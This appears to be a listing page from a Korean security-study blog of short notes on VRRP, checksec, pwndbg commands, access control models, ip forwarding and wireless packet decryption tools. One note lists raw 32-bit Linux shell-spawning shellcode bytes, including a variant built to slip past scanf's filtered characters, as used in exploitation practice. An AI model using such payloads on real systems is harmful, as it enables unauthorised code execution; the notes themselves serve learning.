일 | 월 | 화 | 수 | 목 | 금 | 토 |
---|---|---|---|---|---|---|
1 | ||||||
2 | 3 | 4 | 5 | 6 | 7 | 8 |
9 | 10 | 11 | 12 | 13 | 14 | 15 |
16 | 17 | 18 | 19 | 20 | 21 | 22 |
23 | 24 | 25 | 26 | 27 | 28 | 29 |
30 | 31 |
- decap
- 액티브스캐닝
- OpenID Connect
- Social Network in Game
- 강의
- 패시브스캐닝
- 프로젝트
- 보안
- 대학원
- dnsenum
- 무선채널
- 화이트해커
- Mac
- recon-ng
- 공격그래프
- ip forwarding
- Chrome 작업관리자
- Shift + ESC
- NMAP
- davtest
- Container
- Mimikatz
- cgroups
- 넷크래프트
- airdecap-ng
- SecurityMetric
- 계정 탈취
- Kublet
- AttackGraph
- OIDC
- Today
- Total
목록궁금/한줄짜리 (15)
네른
분산처리 관련해서 작업하다가, Keepalived를 사용하게 됨. VRRP라는걸 사용한다고 함. Virtual Router Redundancy Protocol의 약자로, master router와 backup router를 두어 사용하게 되며, 두 라우터에게 Virtual IP를 부여해서 가용성 유지에 사용 가능함. VRRPv2 프로토콜을 사용한다고 하며, 멀티캐스팅에 224.0.0.18 주소를 사용한다고 함. - 224.0.0.18과 통신하는 패킷을 확인하면 현재 네트워크 내의 VRRP 구성 정보를 알 수 있음. - VRID 라는 값에 따라 각 그룹을 나누게 되므로, 이 값은 중복되면 안됨. - 만약 master가 죽은 경우, backup이 Gratutious ARP 라는 arp 패킷을 전송함. 이를 ..
pwntools를 설치할 때 보통 같이 설치되며 ~/.local/bin/checksec에 위치 checksec ./binary 와 같이 사용하면 바이너리에 적용된 보호기법을 알 수 있음
scanf 함수의 경우 \x09, \x0a, \x0b, \x0c, \x0d, \x20 를 읽지 못함 그리고 기본 25byte짜리 쉘코드(pwntools의 shellcraft.i386.linux.sh())에는 0xb가 들어있다
우회가 필요한 경우 사용해야하는 쉘코드들 32bit shellcode 6 Bytes Shell Code \x31\xc0\xb0\x01\xcd\x80 25 Bytes Shell Code (기본 쉘코드) \x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80 26 Bytes Shell Code (scanf 우회 쉘코드) \x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x31\xc9\x31\xd2\xb0\x08\x40\x40\x40\xcd\x80 41 Bytes Shell Code (setreuid(geteuid(), getr..
전까지 쓰던 r c b ni 등등 말고 추가로 알게된 tele와 vmmap tele : 메모리 덤프 기능으로, 메모리가 참고중인 주소를 재귀적으로 탐색하여 값을 보여줌 vmmap : 가상 메모리 레이아웃을 보여줌
ln -s "/mnt/c/Users/윈도우즈 사용자명/Documents/Projects" /home/리눅스 사용자명(홈디렉토리명)/Projects 출처: https://webdir.tistory.com/542 [WEBDIR]
DAC(Discretionary) : 자원에 대한 접근통제를 사용자 계정이(자원 소유자) 임의대로 할 수 있음 MAC(Mandatory) : 자원에 대한 접근통제는 오로지 관리자에 의해서만 가능함. 관리자만이 유저별 보안등급, 객체별 보안등급을 수정하고 설정할 수 있음 RBAC(Role-Based Access Control) : 관리자가 각 사용자에게 역할을 부여하고, 자원들은 사용자의 역할에 따라 접근 가능 여부가 나뉨.
프로젝트를 진행하면서, 해당 공격 패킷을 수집해야 하는 일이 생겼다. 해당 공격을 수행하면서, ip forwarding 설정방법이 필요해 간략히 정리한다. echo 1 > /proc/sys/net/ipv4/ip_forward (in Kali linux) sudo sysctl -w net.inet.ip.forwarding = 1 (in MAC OS)
airdecap-ng는 aircrack-ng 유틸리티와 함께 설치되는? 그러한 유틸리티이다. decap에서 알 수 있듯이, 무선 패킷의 헤더를 제거할 수 있다. WEP/WPA/WPA2 패킷 캡처 파일에 대해 사용 가능하며, pcap 확장자의 파일만 가능하다. (Wireshark의 경우, pcapng로 저장하나 옵션중에 pcap으로 저장하는 옵션이 있으므로 그것을 이용하면 된다.) 옵션 airdecap-ng -b "공유기의 MAC 주소(BSSID)" "해독할파일명" airdecap-ng -w "WEP 비밀번호" "해독할파일명" airdecap-ng -e "SSID" -p "WPA/WPA2 passphrase" "해독할파일명" 위 과정을 진행하면, 802.11 헤더가 제거되고 ethernet 헤더가 보이는 ..
맥북에서 wireshark로 패킷을 캡처할 때, monitoring 모드를 설정하는 과정이 선행되어야한다. 이 때, 노트북의 무선 랜 카드 채널을 스니핑하고자 하는 채널로 바꿔주어야 한다 sudo airport --channel=3 이렇게 입력하면 3번 채널로 설정된다. 추가로, airport는 맥북에 기본으로 깔려있으나, 기본 경로가 설정되어있지 않다. sudo ln -s /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport /usr/sbin/airport 위와 같은 명령어로 심볼릭 링크를 설정해주어야 한다.